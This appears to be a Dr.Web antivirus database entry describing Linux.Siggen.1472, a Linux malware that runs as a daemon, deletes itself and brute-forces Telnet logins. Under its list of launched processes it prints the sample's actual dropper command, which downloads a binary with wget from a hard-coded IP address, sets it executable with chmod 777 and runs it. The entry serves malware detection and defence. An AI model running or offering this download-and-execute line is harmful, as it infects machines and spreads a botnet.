Linux.Siggen.1472
Added to the Dr.Web virus database:
2019-03-02
Virus description added:
2019-03-01
Technical Information
Malicious functions:
Removes itself
Launches itself as a daemon
Substitutes application name for:
- vge1o4mggva3jdrch574qan28k5fgp8m
Launches processes:
- sh -c wget http://178.62.227.13/wrgjwrgjwrg246356356356/n1; chmod 777 *; ./n1 wget.honey.echo.telnet.x86
- wget http://178.62.227.13/wrgjwrgjwrg246356356356/n1
- chmod 777 n1 run.sh stdout.log
- ./n1 wget.honey.echo.telnet.x86
Performs operations with the file system:
Modifies file access rights:
Creates or modifies files:
Deletes files:
Network activity:
Awaits incoming connections on ports:
- 127.0.0.1:13562
- 0.0.0.0:23
Establishes connection:
- 8.#.8.8:53
- 17#.##.227.13:3456
Attacks using a special dictionary (brute-force technique) via the Telnet protocol.
HTTP GET requests:
- 17#.##.###.#3/wrgjwrgjwrg246356356356/n1
Sends data to the following servers:
Receives data from the following servers:
Curing recommendations
Linux
Free trial
One month (no registration) or three months (registration and renewal discount)
このウェブサイトを継続して訪問する場合、訪問者に関する統計データを収集するためのCookieファイルおよび他のテクノロジーを弊社が利用することに同意したものとします。詳細